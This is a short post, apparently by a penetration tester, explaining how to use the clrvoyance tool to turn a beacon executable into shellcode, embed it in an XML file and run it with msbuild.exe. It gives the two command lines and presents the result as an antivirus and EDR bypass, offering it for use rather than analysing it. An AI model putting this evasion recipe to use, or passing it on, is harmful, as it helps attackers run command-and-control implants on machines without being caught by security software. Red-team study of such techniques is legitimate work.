I have performing more and more External and Internal Penetration Tests as well as more and more Offensive Cyber Security Engagements for my day job (compared to focusing on Web Application Penetration Tests).
One of the most useful tools I’ve found for internal penetration tests is clrvoyance. An alternative to donut
How do you use clyrvoyance?
Well you take the executable and run the following:
First, python3 clrvoyance.py -a ~/directory/to/executable/beacon.exe -p32
Then python3 clrvoyance.py -a ~/directory/to/executable/shellcode/beacon.exe.shellcode -d net
now insert that shellcode into any xml file (which I’ll inlcude in the future if you need one)
And use msbuiild.exe to execute it!
Enjoy the Anti-Virus/EDR bypass 🙂